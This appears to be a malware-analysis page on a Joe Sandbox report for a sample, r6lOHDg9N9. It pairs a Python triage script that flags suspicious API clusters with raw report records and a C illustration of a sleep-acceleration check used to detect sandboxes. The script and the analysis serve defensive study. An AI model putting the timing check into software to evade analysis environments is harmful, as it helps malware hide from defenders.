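```python
"""Parse Joe Sandbox 'APIs' records and flag API clusters worth a closer look.

Added example for this page; not Joe Sandbox code. The cluster rules below
are the author's own heuristics, not anything the sandbox emits.
"""
import re

# Constructed input: trimmed copies of three API records from the report.
SAMPLE = """\
APIs
• LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
• GetProcAddress.KERNEL32(?,?), ref: 00463E68
• GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
• GetProcAddress.KERNEL32(?,?), ref: 00463ECE
• FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
Memory Dump Source
APIs
• GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
• SetKeyboardState.USER32(00000080), ref: 0044C3ED
• PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
• PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
• SendInput.USER32 ref: 0044C509
Memory Dump Source
APIs
• RegEnumKeyExW.ADVAPI32 ref: 004422F0
• RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
• RegCloseKey.ADVAPI32(00000000), ref: 0044234E
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
• RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
Memory Dump Source
"""

# One call line: optional "Part of subcall function XXXX:" prefix, then
# Api.MODULE, optional "(args)", and "ref: ADDRESS". SendInput above has no
# argument list at all, so the parenthesised group is optional.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# Window messages that carry keystrokes when posted to a window.
KEY_MESSAGES = {"00000100", "00000101", "00000102", "00000104", "00000105"}


def parse_records(text):
    """Return one list of call dicts per 'APIs' block in the report text."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            records.append(current)
            continue
        if line == "Memory Dump Source":
            current = None  # the API list for this function ends here
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            current.append({"api": m.group("api"), "module": m.group("mod"),
                            "args": args, "ref": m.group("ref")})
    return records


def flag_record(calls):
    """Apply the heuristic cluster rules to one function's API list."""
    names = {c["api"] for c in calls}
    flags = []
    loaders = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}
    if names & loaders and "GetProcAddress" in names:
        flags.append("dynamic_import")
    posts_key_msg = any(
        c["api"] in ("PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA")
        and len(c["args"]) > 1 and c["args"][1] in KEY_MESSAGES
        for c in calls
    )
    if "SetKeyboardState" in names and (posts_key_msg or "SendInput" in names):
        flags.append("keystroke_injection")
    if names & {"RegEnumKeyExW", "RegEnumKeyExA"} and names & {"RegDeleteKeyW", "RegDeleteKeyA"}:
        flags.append("registry_key_wipe")
    return flags


def flag_records(text):
    """Flags for every record in the text, in report order."""
    return [flag_record(r) for r in parse_records(text)]


if __name__ == "__main__":
    for record, flags in zip(parse_records(SAMPLE), flag_records(SAMPLE)):
        first = record[0]["ref"] if record else "?"
        print(f"record @ {first}: {', '.join(flags) or 'no flags'}")
```

Paste any number of `APIs ... Memory Dump Source` blocks from the report into `SAMPLE` (or read them from a file) to triage a whole function listing at once; the `Part of subcall function` lines are kept as ordinary calls so that a helper's APIs count toward its caller's record.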
                                                                              APIs
                                                                              • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                              • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Enum$CloseDeleteOpen
                                                                              • String ID:
                                                                              • API String ID: 2095303065-0
                                                                              • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                              • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                              • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                              • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                              APIs
                                                                              • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                              • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                              • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfile$SectionWrite$String
                                                                              • String ID:
                                                                              • API String ID: 2832842796-0
                                                                              • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                              • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                              • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                              • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                              APIs
                                                                              • GetClientRect.USER32(?,?), ref: 00447997
                                                                              • GetCursorPos.USER32(?), ref: 004479A2
                                                                              • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                              • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                              • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 1822080540-0
                                                                              • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                              • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                              • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                              • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                              • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                              • EndPaint.USER32(?,?), ref: 00447CD1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                              • String ID:
                                                                              • API String ID: 659298297-0
                                                                              • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                              • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                              • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                              • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 004478A7
                                                                              • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                              • GetCursorPos.USER32(?), ref: 00447935
                                                                              • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CursorMenuPopupTrack$Proc
                                                                              • String ID:
                                                                              • API String ID: 1300944170-0
                                                                              • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                              • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                              • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                              • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                              APIs
                                                                              • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                              • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                              • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                • Part of subcall function 004413F0: SendMessageW.USER32(02FF1A78,000000F1,00000000,00000000), ref: 004414C6
                                                                                • Part of subcall function 004413F0: SendMessageW.USER32(02FF1A78,000000F1,00000001,00000000), ref: 004414F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnableMessageSend$LongShow
                                                                              • String ID:
                                                                              • API String ID: 142311417-0
                                                                              • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                              • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                              • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                              • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0044955A
                                                                                • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                              • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                              • _wcslen.LIBCMT ref: 004495C1
                                                                              • _wcslen.LIBCMT ref: 004495CE
                                                                              • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                              • String ID:
                                                                              • API String ID: 1843234404-0
                                                                              • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                              • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                              • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                              • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                              • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                              • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                              • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 00445721
                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                              • _wcslen.LIBCMT ref: 004457A3
                                                                              • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                              • String ID:
                                                                              • API String ID: 3087257052-0
                                                                              • Opcode ID: 453d8cf2d53bd446159bbb0baa073021fe1e74c256db72c881888fb31e2a567b
                                                                              • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                              • Opcode Fuzzy Hash: 453d8cf2d53bd446159bbb0baa073021fe1e74c256db72c881888fb31e2a567b
                                                                              • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 00459DEF
                                                                              • GetForegroundWindow.USER32 ref: 00459E07
                                                                              • GetDC.USER32(00000000), ref: 00459E44
                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ForegroundPixelRelease
                                                                              • String ID:
                                                                              • API String ID: 4156661090-0
                                                                              • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                              • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                              • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                              • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                              APIs
                                                                                • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                              • socket.WSOCK32(00000002,00000001,00000006), ref: 00464985
                                                                              • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                              • connect.WSOCK32(00000000,00000000,00000010), ref: 004649CD
                                                                              • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                              • closesocket.WSOCK32(00000000), ref: 00464A07
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 245547762-0
                                                                              • Opcode ID: c11d93ef0e5925fc7b778e12926c76e847d2ba71e7f4531691fb5523561cfb0e
                                                                              • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                              • Opcode Fuzzy Hash: c11d93ef0e5925fc7b778e12926c76e847d2ba71e7f4531691fb5523561cfb0e
                                                                              • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 00447151
                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                              • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                              • BeginPath.GDI32(?), ref: 004471B7
                                                                              • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Object$Select$BeginCreateDeletePath
                                                                              • String ID:
                                                                              • API String ID: 2338827641-0
                                                                              • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                              • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                              • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                              • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CounterPerformanceQuerySleep
                                                                              • String ID:
                                                                              • API String ID: 2875609808-0
                                                                              • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                              • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                              • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                              • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
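The function above brackets each Sleep call with QueryPerformanceCounter, which is the classic sleep-acceleration check: if far less wall-clock time passed than was requested, Sleep has been hooked or the sandbox is fast-forwarding the clock. The following C program is an added illustration of that pattern and is not code recovered from r6lOHDg9N9.exe. The Windows branch uses the same two APIs the sample calls; the POSIX branch (clock_gettime, nanosleep) and the one-half threshold are assumptions so that the example also builds and runs off Windows.

```c
#ifndef _WIN32
#define _POSIX_C_SOURCE 199309L
#endif
#include <stdint.h>
#include <stdio.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <time.h>
#endif

/* Monotonic timestamp in microseconds.
 * Windows: QueryPerformanceCounter, the counter the analysed function reads
 * around its Sleep calls. The POSIX branch is an assumption added so the
 * example also runs outside Windows; the sample itself is Win32 only. */
static uint64_t now_us(void)
{
#ifdef _WIN32
    LARGE_INTEGER freq, ctr;
    QueryPerformanceFrequency(&freq);
    QueryPerformanceCounter(&ctr);
    uint64_t q = (uint64_t)ctr.QuadPart, f = (uint64_t)freq.QuadPart;
    /* split into whole seconds and remainder to avoid 64-bit overflow */
    return (q / f) * 1000000ULL + ((q % f) * 1000000ULL) / f;
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000ULL + (uint64_t)ts.tv_nsec / 1000ULL;
#endif
}

/* Sleep for the requested number of milliseconds (Win32 Sleep on Windows). */
static void sleep_ms(unsigned ms)
{
#ifdef _WIN32
    Sleep(ms);
#else
    struct timespec ts = { (time_t)(ms / 1000), (long)(ms % 1000) * 1000000L };
    nanosleep(&ts, NULL);
#endif
}

/* Policy (assumed threshold): the sleep counts as shortened when less than
 * half of the requested time actually elapsed. A hook that turns Sleep(ms)
 * into a no-op, or a clock that is fast-forwarded past the sleep, trips this;
 * ordinary scheduler jitter (Sleep may overshoot, never undershoot by half)
 * does not. Kept separate from the measurement so it can be tested. */
int sleep_was_shortened(uint64_t requested_ms, uint64_t elapsed_us)
{
    return elapsed_us < (requested_ms * 1000ULL) / 2ULL;
}

/* Measure one Sleep: returns 1 if it was cut short, 0 if it ran in full. */
int timing_check(unsigned ms)
{
    uint64_t before = now_us();
    sleep_ms(ms);
    uint64_t after = now_us();
    return sleep_was_shortened(ms, after - before);
}
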